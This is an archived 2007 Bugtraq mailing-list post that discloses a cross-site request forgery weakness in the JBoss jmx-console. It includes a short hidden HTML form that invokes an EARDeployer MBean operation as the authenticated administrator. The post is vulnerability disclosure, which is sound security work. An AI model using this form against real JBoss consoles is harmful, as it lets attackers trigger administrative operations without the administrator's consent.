| To: | bugtraq@securityfocus.com |
|---|---|
| Subject: | JBoss jmx-console CSRF |
| From: | buben.razuma@gmail.com |
| Date: | 22 Feb 2007 11:04:20 -0000 |
| Delivered-to: | sp-com-lists@consult.net |
| Delivered-to: | bugtraq-list@securepoint.com |
| Delivered-to: | mailing list bugtraq@securityfocus.com |
| Delivered-to: | moderator for bugtraq@securityfocus.com |
| List-help: | <mailto:bugtraq-help@securityfocus.com> |
| List-id: | <bugtraq.list-id.securityfocus.com> |
| List-post: | <mailto:bugtraq@securityfocus.com> |
| List-subscribe: | <mailto:bugtraq-subscribe@securityfocus.com> |
| List-unsubscribe: | <mailto:bugtraq-unsubscribe@securityfocus.com> |
| Mailing-list: | contact bugtraq-help@securityfocus.com; run by ezmlm |
Hello! Recent message about JBoss's console made me looking at that interface again and it seems that it is vulnerable for the CRSF attacks. MBean settings may be changed and operations may be invoked on behalf of the authenticated administrator by the hidden submitting form like follows: <form method="post" action="http://host:port/jmx-console/HtmlAdaptor";> <input type="hidden" name="action" value="invokeOp"> <input type="hidden" name="name" value="jboss.j2ee:service=EARDeployer"> <input type="hidden" name="methodIndex" value="0"> <input type="submit" value="Invoke"> </form> Please, correct me, if I'm wrong. BR, B.R. Best regards, |
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | JBrowser acces to admin/config files, sn0oPy . team |
|---|---|
| Next by Date: | WebSpell > 4.0 Authentication Bypass and arbitrary code execution, r . verton |
| Previous by Thread: | JBrowser acces to admin/config files, sn0oPy . team |
| Next by Thread: | Re: JBoss jmx-console CSRF, pagvac |
| Indexes: | [Date] [Thread] [Top] [All Lists] |